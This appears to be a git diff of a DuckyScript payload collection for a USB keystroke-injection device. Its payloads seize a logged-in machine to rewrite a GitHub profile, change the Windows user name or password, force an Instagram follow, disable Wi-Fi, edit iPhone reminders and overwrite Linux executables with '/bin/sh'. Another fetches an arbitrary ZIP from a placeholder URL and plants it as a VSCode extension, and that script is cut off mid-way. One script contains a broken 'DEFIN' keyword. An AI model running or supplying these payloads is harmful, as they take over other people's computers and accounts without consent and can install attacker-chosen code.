|
||||
# #
|
||||
###################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet connection
|
||||
REM - Logged in Github
|
||||
REM - PayloadStudio >= 1.3.1
|
||||
|
||||
REM You must set the new Profile Settings
|
||||
DEFINE #NAME example
|
||||
DEFINE #BIO example
|
||||
DEFINE #CUSTOM-PRONOUNS example
|
||||
DEFINE #URL example
|
||||
DEFINE #SOCIAL-ACCOUNT-1 example
|
||||
DEFINE #SOCIAL-ACCOUNT-2 example
|
||||
DEFINE #SOCIAL-ACCOUNT-3 example
|
||||
DEFINE #SOCIAL-ACCOUNT-4 example
|
||||
DEFINE #COMPANY example
|
||||
DEFINE #LOCATION example
|
||||
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN powershell
|
||||
DELAY 500
|
||||
|
||||
STRINGLN Start-Process "https://github.com/settings/profile"; exit;
|
||||
REM It depends by the computer power and by the internet connection power
|
||||
DELAY 2000
|
||||
|
||||
REPEAT 37 TAB
|
||||
STRING #NAME
|
||||
REPEAT 4 TAB
|
||||
STRING #BIO
|
||||
TAB
|
||||
REPEAT 4 DOWNARROW
|
||||
STRING #CUSTOM-PRONOUNS
|
||||
TAB
|
||||
STRING #URL
|
||||
TAB
|
||||
STRING #SOCIAL-ACCOUNT-1
|
||||
TAB
|
||||
STRING #SOCIAL-ACCOUNT-2
|
||||
TAB
|
||||
STRING #SOCIAL-ACCOUNT-3
|
||||
TAB
|
||||
STRING #SOCIAL-ACCOUNT-4
|
||||
TAB
|
||||
STRING #COMPANY
|
||||
TAB
|
||||
STRING #LOCATION
|
||||
REPEAT 4 TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
ALT-F4
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
This script can be used to change the windows user name.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -19,3 +19,25 @@ It is absurd that you can do so many things on windows without asking for permis
|
|||
```DuckyScript
|
||||
DEFINE NEW_NAME example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Change Windows User Name |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM #############################################
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
Through this script you will be able to change windows user's password super fast.
|
||||
|
||||
**Category**: Execute
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
|
@ -26,3 +26,25 @@ It is always very fascinating to see how many things you can do on Windows syste
|
|||
|
||||
- `STRINGLN Get-ExecutionPolicy -List`
|
||||
![](docs/3.png)
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -3,7 +3,7 @@ REM # |
|
|||
REM # Title : Change the password of the Windows user |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execute |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ############################################################
|
||||
|
|
|
@ -19,10 +19,28 @@ Opens PowerShell hidden, download a Python script, execute it, remove Python scr
|
|||
* Internet Connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- No settings - Plug-And-Play
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,52 @@
|
|||
# Delete A Reminder On An iPhone
|
||||
|
||||
This script can be used to delete a reminder really fast using an iPhone, so iOS system.
|
||||
|
||||
Open search bar, then open the Reminder app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Dependencies
|
||||
|
||||
* The phone must be unlocked
|
||||
|
||||
## Test
|
||||
|
||||
- iPhone 14
|
||||
- iOS 16.4.1
|
||||
|
||||
## Settings
|
||||
|
||||
- You need to change the name of the application according to the language you have on your phone.
|
||||
|
||||
```DuckyScript
|
||||
[21] DEFINE #REMINDER-APP-NAME example
|
||||
```
|
||||
|
||||
- You should know the reminder name that you want to delete
|
||||
|
||||
```DuckyScript
|
||||
[23] DEFINE #REMINDER-NAME example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,41 @@
|
|||
REM_BLOCK
|
||||
###################################################
|
||||
# #
|
||||
# Title : Delete A Reminder On An iPhone #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : iPhone #
|
||||
# #
|
||||
###################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - The phone must be unlocked
|
||||
|
||||
REM Tested on:
|
||||
REM - iPhone 14
|
||||
REM - iOS 16.4.1
|
||||
|
||||
REM You need to change the name of the application according to the language you have on your phone.
|
||||
DEFINE #REMINDER-APP-NAME example
|
||||
REM You should know the reminder name that you want to delete
|
||||
DEFINE #REMINDER-NAME example
|
||||
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
DELAY 300
|
||||
STRINGLN #REMINDER-APP-NAME
|
||||
DELAY 2000
|
||||
GUI f
|
||||
DELAY 1000
|
||||
STRING #REMINDER-NAME
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
GUI a
|
||||
BACKSPACE
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
GUI h
|
|
@ -0,0 +1,24 @@
|
|||
# Disable WiFi 🛜
|
||||
|
||||
This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
|
||||
|
||||
### Details
|
||||
|
||||
- **Title**: Disable WiFi
|
||||
- **Author**: bst04 - Aleff
|
||||
- **Version**: 1.0
|
||||
- **Category**: Execution
|
||||
- **Target**: MacOS
|
||||
|
||||
### Dependencies
|
||||
|
||||
- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||
`DEFINE #MODE off`
|
||||
|
||||
## How It Works 📜
|
||||
|
||||
1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
|
||||
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||
3. After readiness is confirmed, the script:
|
||||
- Runs commands to open **Terminal**.
|
||||
- Run or stop the WiFi
|
|
@ -0,0 +1,53 @@
|
|||
REM_BLOCK
|
||||
##################################
|
||||
# #
|
||||
# Title : Disable WiFi #
|
||||
# Author : bst04 - Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : MacOS #
|
||||
# #
|
||||
##################################
|
||||
END_REM
|
||||
|
||||
REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
|
||||
DEFINE #MODE off
|
||||
|
||||
EXTENSION DETECT_READY
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
|
||||
TARGETS:
|
||||
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #RESPONSE_DELAY 25
|
||||
DEFINE #ITERATION_LIMIT 120
|
||||
|
||||
VAR $C = 0
|
||||
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||
CAPSLOCK
|
||||
DELAY #RESPONSE_DELAY
|
||||
$C = ($C + 1)
|
||||
END_WHILE
|
||||
CAPSLOCK
|
||||
END_EXTENSION
|
||||
|
||||
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||
DELAY 200
|
||||
|
||||
GUI SPACE
|
||||
DELAY 250
|
||||
STRINGLN TERMINAL
|
||||
DELAY 250
|
||||
STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
|
||||
DELAY 250
|
||||
GUI q
|
|
@ -0,0 +1,58 @@
|
|||
# Edit A Reminder On An iPhone
|
||||
|
||||
This script can be used to change a reminder name really fast using an iPhone, so iOS system.
|
||||
|
||||
Open search bar, then open the REMINDER app (I used the italian name so 'Promemoria'), then delete what is (hidden) stored and write the number, then call it.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Dependencies
|
||||
|
||||
* The phone must be unlocked
|
||||
|
||||
## Test
|
||||
|
||||
- iPhone 14
|
||||
- iOS 16.4.1
|
||||
|
||||
## Settings
|
||||
|
||||
- You need to change the name of the application according to the language you have on your phone.
|
||||
|
||||
```DuckyScript
|
||||
[21] DEFINE #REMINDER-APP-NAME
|
||||
```
|
||||
|
||||
- You should know the old name of the reminder that you want to change
|
||||
|
||||
```DuckyScript
|
||||
[23] DEFINE #OLD-REMINDER-NAME example
|
||||
```
|
||||
|
||||
- Here you should set the new reminder name
|
||||
|
||||
```DuckyScript
|
||||
[25] DEFIN #NEW-REMINDER-NAME example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,42 @@
|
|||
REM_BLOCK
|
||||
#################################################
|
||||
# #
|
||||
# Title : Edit A Reminder On An iPhone #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : iPhone #
|
||||
# #
|
||||
#################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - The phone must be unlocked
|
||||
|
||||
REM Tested on:
|
||||
REM - iPhone 14
|
||||
REM - iOS 16.4.1
|
||||
|
||||
REM You need to change the name of the application according to the language you have on your phone.
|
||||
DEFINE #REMINDER-APP-NAME example
|
||||
REM You should know the old name of the reminder that you want to change
|
||||
DEFINE #OLD-REMINDER-NAME example
|
||||
REM Here you should set the new reminder name
|
||||
DEFIN #NEW-REMINDER-NAME example
|
||||
|
||||
DELAY 500
|
||||
GUI SPACE
|
||||
DELAY 300
|
||||
STRINGLN #REMINDER-APP-NAME
|
||||
DELAY 2000
|
||||
GUI f
|
||||
DELAY 1000
|
||||
STRING #OLD-REMINDER-NAME
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
GUI a
|
||||
BACKSPACE
|
||||
STRINGLN #NEW-REMINDER-NAME
|
||||
DELAY 500
|
||||
GUI h
|
|
@ -34,3 +34,25 @@ DEFINE PATH_TO_DESKTOP_FILE example/path
|
|||
```DuckyScript
|
||||
DEFINE ORIGINAL_DESKTOP_FILE_NAME example
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -18,10 +18,6 @@ A script used to detect all executable files in a Linux system. An executable fi
|
|||
|
||||
* Linux system
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* You can edit the content that you want to put into the executable file.
|
||||
|
@ -30,3 +26,25 @@ A script used to detect all executable files in a Linux system. An executable fi
|
|||
# You can put whatever you want into the executable file
|
||||
echo "/bin/sh" > "$file"
|
||||
```
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,50 @@
|
|||
# Follow someone on Instagram
|
||||
|
||||
This script can be used to prank friends by having them follow an Instagram account or it can be used by yourself to speed up this process.
|
||||
|
||||
Open a PowerShell, start a process trough the default browser that go to an instagram link like this one `https://www.instagram.com/alessandro_greco_aka_aleff/` closing the PowerShell. Then use some TABs to go to Follow button and then close the browser.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Note
|
||||
|
||||
Tested on:
|
||||
- Windows 11 Eng
|
||||
- Firefox Browser Eng
|
||||
|
||||
## Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Instagram account logged in
|
||||
|
||||
## Settings
|
||||
|
||||
- You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
|
||||
|
||||
`[18] DEFINE #INSTAGRAM_LINK example`
|
||||
|
||||
- It depends by the computer power and by the internet connection power
|
||||
|
||||
`[72] DELAY 2000`
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,81 @@
|
|||
REM_BLOCK
|
||||
################################################
|
||||
# #
|
||||
# Title : Follow someone on Instagram #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Instagram account logged in
|
||||
|
||||
REM You must set the Instagram account that you want to follow i.e. https://www.instagram.com/alessandro_greco_aka_aleff/
|
||||
DEFINE #INSTAGRAM_LINK example
|
||||
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process "#INSTAGRAM_LINK"; exit;
|
||||
REM It depends by the computer power and by the internet connection power
|
||||
DELAY 2000
|
||||
|
||||
REM Go to Follow button and click it
|
||||
REPEAT 12 TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Close the Browser
|
||||
ALT F4
|
|
@ -0,0 +1,98 @@
|
|||
# Install Any Arbitrary VSCode Extension
|
||||
|
||||
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
|
||||
|
||||
1. Removes any pre-existing version of the extension (if applicable).
|
||||
2. Downloads a ZIP archive of a VSCode extension.
|
||||
3. Extracts the extension to the correct VSCode extensions folder.
|
||||
|
||||
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
|
||||
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
|
||||
- Removes any previous version of the extension.
|
||||
- Completely automated, requiring no manual intervention once the script is executed.
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Target OS**: Windows 10/11
|
||||
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
|
||||
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
|
||||
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
|
||||
|
||||
## Usage
|
||||
|
||||
### DuckyScript Configuration
|
||||
|
||||
Before running the script, make sure to configure the following two variables in the script:
|
||||
|
||||
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
|
||||
```plaintext
|
||||
DEFINE #EXTENSION_NAME example
|
||||
```
|
||||
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
|
||||
|
||||
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
|
||||
```plaintext
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
```
|
||||
|
||||
### PowerShell Commands Breakdown
|
||||
|
||||
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
|
||||
```powershell
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
```
|
||||
|
||||
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
|
||||
```powershell
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
}
|
||||
```
|
||||
|
||||
## Notes
|
||||
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
|
||||
- Make sure that PowerShell is available on the target machine.
|
||||
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
@ -0,0 +1,88 @@
|
|||
REM_BLOCK
|
||||
##########################################################
|
||||
# #
|
||||
# Title : Install Any Arbitrary VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10 #
|
||||
# #
|
||||
##########################################################
|
||||
END_REM
|
||||
|
||||
REM Replace "example" with the name of the extension folder
|
||||
DEFINE #EXTENSION_NAME example
|
||||
|
||||
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
END_STRINGLN
|
||||
|
||||
REM May it depends by the extension...
|
||||
DELAY 2000
|
||||
|
||||
